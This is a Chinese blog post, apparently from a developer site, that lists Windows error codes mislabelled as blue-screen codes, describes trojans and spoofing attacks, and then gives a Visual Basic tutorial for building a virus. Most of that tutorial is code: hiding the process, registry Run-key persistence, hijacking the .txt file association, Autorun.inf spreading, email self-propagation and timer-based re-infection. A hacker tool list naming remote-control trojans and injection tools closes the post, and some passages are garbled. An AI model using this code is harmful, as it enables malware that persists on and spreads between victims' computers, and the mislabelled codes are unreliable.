计算机简单入门

蓝屏代码

0X0000000 操作完成
0X0000001 不正确的函数
0X0000002 系统找不到指定的文件
0X0000003 系统找不到指定的路径
0X0000004 系统无法打开文件
0X0000005 拒绝存取
0X0000006 无效的代码
0X0000007 内存控制模块已损坏
0X0000008 内存空间不足,无法处理这个指令
0X0000009 内存控制模块位址无效
0X000000A 环境不正确
0X000000B 尝试载入一个格式错误的程序
0X000000C 存取码错误
0X000000D 资料错误
0X000000E 内存空间不够,无法完成这项操作
0X000000F 系统找不到指定的硬盘
0X0000010 无法移除目录

计算机木马

木马,木马程序是目前比较流行的病毒文件.与一般的病毒不同.它不会自我繁殖.也并不“刻意”地去感染其他文件.它通过将自身伪装吸引用户下载执行。向施种木马者提供打开被种者电脑的门户.使施种者可以任意毁坏、窃取被种者的文件。?
协议欺骗攻击技术,是针对网络协议的缺陷.采用某种欺骗的手段.假冒身份以截获信息或取得相关特权的攻击方式。主要的协议欺骗攻击方式有: IP欺骗攻击:就是通过伪造某台主机的IP地址骗取特权从而进行攻击的技术。 越妞欺骗攻击:就是利用ARP协议漏洞,通过伪造lP地址和MAC地址实现ARP欺骗的攻击技术。 DNS欺骗攻击:攻击者采用种种欺骗手段。使用户查询DNS服务器进行域名解析时获得一个错误的地址结果.从而可将用户引导到错误的互联网站点.或者发送一个电子邮件到一个未经授权的邮件服务器等。 ?
口令攻击,并不是一种具体的攻击方式.而是一类攻击的总称,这类攻击的攻击目标都是口令。攻击者攻击目标时常常把破译用户的u令作为攻击的开始。只要攻击者能猜测或者确定用广|的口令.他就能获得机器或者网络的访问权.并能访问用户能访问到的任何资源,如果这个用户有域管理员或root用户权限.这是极其危险的。这种方法的前提是必须先得到该主机上某个合法用户的帐号.然后再进行合法用户口令的破泽。获得普通用,r11帐号的方法很多。口令攻击是指黑客以LJ令为攻击目标.破解合法用户的口令.或避开口令验证过程.然后冒充合法用户潜入目标网络系统.夺取目标系统控制权的过程。如果u令攻击成功.黑客进入了目标网络系统。

简单的病毒制作

对于接触计算机的朋友们来说,病毒已经不在是一个陌生的东西。病毒一般都具有传播、隐藏、破坏等能力。所以自从第一个病毒问世以来,它便被人们视为一种神秘的东西。但是,我们要知道。病毒也是程序,也是由人写出来的。所以,病毒并不是什么高不可攀的东西。现在,让我们了解一下VB制作病毒的原理。

首先,病毒是有隐藏性的。如何来实现病毒的隐藏是很多年来的热点话题。我们先不接触什么线程插入技术。我们要实行自我隐藏,就要用到API函数。其代码如下:

Public Declare Function GetCurrentProcessid Lib "kernel32" () As Long

Public Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As Long, ByVal dwType As Long)

Public Const RSP_SIMPLE_SERVICE = 1

Public Const RSP_UNREGISTER_SERVICE = 0

Public Sub MakeMeService()

Dim pid As Long

Dim resery As Long

pid = GetCurrentProcessid()

regserv = RegisterServiceProcess(pid, RSP_SIMPLE_SERVICE)

End Sub

这样就实现了自我隐藏。还有别的什么App.Title = ""和App.TaskVisible = False都可以用于VB病毒的隐藏。

病毒光会隐藏还不行,还要有常驻内存的能力。说通俗点,计算机关闭病毒也就跟着死去,而计算机重启,病毒也要跟这复活。所以,我们接下来的任务就是:实现病毒的开机自启。

了解病毒的朋友会知道,病毒一般是利用在注册表中插入相应键值来实现开机自启的。所以,我们就要利用编程来实现着一功能。读写注册表要用到API函数,代码:

Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long

Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpvalueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long

上述是API声明。病毒的开机自启就是在RUN下建立一个启动项,代码:

Dim hKey As Long

Dim cc

Let cc = Len("病毒的绝对路径")

RegCreateKey HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Runservices", hKey

RegSetValueEx hKey, "键名", 0, REG_SZ, ByVal "病毒的绝对路径", cc

RegCloseKey hKey

以上代码执行后会在注册表中加入一个病毒的启动项。

光利用开机自启来长驻内存也太容易被杀了。所以,我们还要想尽一切办法来让病毒启动。这里介绍的2种办法。

第一种。修改文本文件的关联。其代码如下:

API声明:

Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Private Declare Function RegSetValue Lib "advapi32.dll" Alias "RegSetValueA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long

Const HKEY_CLASSES_ROOT = &H80000000

Const REG_SZ = 1

实现代码:

Dim sKeyName As String '存储键名

Dim sKeyValue As String '存储键值

Dim MyReturn As Long '存储返回值信息

Dim keyhandle As Long

sKeyName = "Test"

sKeyValue = "Test Application"

MyReturn& = RegCreateKey&(HKEY_CLASSES_ROOT, sKeyName, keyhandle&)

MyReturn& = RegSetValue&(keyhandle&, "", REG_SZ, sKeyValue, 0&)

MsgBox MyReturn&

sKeyName = ".txt" '要建立关联的文件后缀名

sKeyValue = "Test"

MyReturn& = RegCreateKey&(HKEY_CLASSES_ROOT, sKeyName, keyhandle&)

MyReturn& = RegSetValue&(keyhandle&, "", REG_SZ, sKeyValue, 0&)

sKeyName = "Test"

sKeyValue = "D:\\病毒.exe %1" '自己程序的位置和名称

MyReturn& = RegCreateKey&(HKEY_CLASSES_ROOT, sKeyName, keyhandle&)

MyReturn& = RegSetValue&(keyhandle&, "shell\open\command", REG_SZ, sKeyValue, MAX_PATH)

End Sub

以上是利用修改TXT文件关联来实现病毒启动的。

第二种,利用Autorun.inf

光盘就是利用这个来自动播放的,所以我就不废话了。

实现代码:

If Dir("F:\") <> "" Then Let a = App.Path + "\" + App.EXEName + ".exe"

FileCopy a, "C:\病毒.exe"

Open "Autorun.inf" For Output As #1

Print #1, "[autorun]"

Print #1, "OPEN=病毒.exe"

Close #1

这样就实现了双击C盘启动病毒的作用。

下面说一下病毒的传播,病毒的传播可以说是八仙过海。主要的传播方式就是电子邮件传播,远程溢出等。

远程溢出这里不做详解。第一是我不太熟练,只会用,不会说。第二是要讲清楚很麻烦。所以,我讲一下电子邮件传播。

首先,建立一个WINSOCKE。然后利用编程来实现。这里只说思路。

ConnectToServer Server, Winsock1 ‘这是向服务器建立连接

SendMail FromAddress, ToAddress, Subject, Body, Winsock1, Attach ‘发送邮件

Attach 附件地址

利用这样的原理来群发,可以达到传播自己的目的。

还有一种就是U盘/A盘传播,原理上面已经说过。利用Autorun.inf文件,这里就不废话了。

说了这么多,还剩最后一点,那就是破坏性。这个就不详细阐述。什么自动关机,无限增殖。大家自己发挥想象,这不是很难的事。

最后总结,一个什么样的病毒,它必须生活在特定的操作系统下。所以,病毒做出来后,不一定能在什么操作系统下都能用。还有一点,病毒必须能自己保护自己。这里推荐使用TIMER。利用这个部件来不断的写注册表。这样,很难删掉病毒的启动键值。还要保护自身的增殖文件。比如:

Let a = App.Path + "\" + App.EXEName + ".exe"

If Dir("C:\Program Files\病毒.exe") <> "" Then

Else: FileCopy a, "C:\Program Files\病毒.exe"

最后,还有最重要的一点。那就是容错语句。尽量多加。以防万一。

友情提示:最好不要尝试,否则后果自负

黑客hacker入门工具,工具黑客

一 必备基本工具
1 Netcat 2 IIS工具包 3 VMware
二 端口扫描工具
1 nmap 2 udp_scan 3 NetScanTools
4 SuperScan 5 IPEye
三 Windows工具
1 net工具 2 nbtstat 3 Winfingerprint
4 GetUserInfo 5 NTAutoAttack 6 PsTools
四 常用小工具
1 ADSL密码查看器 2 文件捆绑机 3 捆绑检测器
五 口令破解与强力工具
1 Cain 2 LC5 3 MD5Crack3
六 安全防范工具
1 绿鹰PC万能精灵 2 BlackICE 3 EXE捆绑检测工具
七 WEB攻击工具
1 脚本漏洞攻击工具 2 脚本检测工具 3 后台检测工具
八 溢出工具
1 溢出工具 2 提升权限工具
九 系统安全设置辅助工具
1.修改3389策略及端口的工具 2.服务器安全设置脚本工具 3 Window 按钮突破专家
十 后门和远程访问工具
1 VNC 2 pcanywhere 3 Radmin 4 网络神偷 5 上兴远程控制 6 灰鸽子
7 神气儿
十一 入侵检测工具
1 Snort IDScenter
十二 安全扫描工具组合
1 X-SCAN 书 2 流光 3 著名工具SSS
4 Internet 扫描工具 5 X-WAY
十三 网络侦察工具
1 whois/fwhois 2 host、dig和nslookup 3 Ping
4 Fping 5 traceroute 6 hping
十四 端口重定向工具
1 Datapipe 2 FPipe 3 WinRelay
十五 嗅探器
1 无痕工具之端口探测器 2 网络抓包器V1.3 3 ARPSniffer 4 Iris 4.00.2 正式版 5 SQLServerSniffer

procexp.exe
process monitor     这两个微软自己的系统进程工具,很好用
nmap                   端口扫描工具
OD                      汇编修改工具,可用来手动免杀和破解
chopper               菜刀
Havij                    sql注入工具
MetaSploit-framework    全自动溢出工具,比较强大,同时体积也很大

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值